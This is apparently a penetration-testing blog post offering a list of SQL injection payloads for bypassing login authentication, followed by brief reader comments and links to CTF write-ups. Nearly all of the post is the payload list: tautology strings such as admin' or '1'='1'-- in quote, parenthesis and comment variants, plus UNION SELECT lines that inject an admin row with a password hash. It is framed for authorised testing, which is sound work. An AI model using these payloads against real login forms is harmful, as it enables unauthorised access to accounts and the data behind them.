This list can be used by penetration testers when testing for SQL injection authentication bypass.A penetration tester can use it manually or through burp in order to automate the process.The creator of this list is Dr. Emin İslam TatlıIf (OWASP Board Member).If you have any other suggestions please feel free to leave a comment in order to improve and expand the list.
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
Dec 27, 2012 @ 14:22:22
Thanks a lot mate for the hard work .
Jan 06, 2013 @ 20:48:08
great jobs, thanks you !!!
Jan 09, 2013 @ 16:16:30
Hello, thank you netbiosX 🙂
Could you tell me what’s the difference between all these ways ?
if there is a break in the website or application, somme ways could success and others not ??!!
Thank you.
Authentication Bypass | Official @bugcrowd BlogOfficial @bugcrowd Blog
Aug 20, 2013 @ 04:53:52
Oct 18, 2013 @ 06:40:37
great job
PicoCTF 2013 – Injection | dook's Blog
Feb 02, 2015 @ 06:53:11
Nov 07, 2016 @ 07:28:05
how to use ??
HackDay CTF 2016 (Albania) – N13manT
Nov 29, 2016 @ 13:38:04
Jun 11, 2017 @ 02:31:08
Sep 08, 2017 @ 04:48:55
Nice list thanks for sharing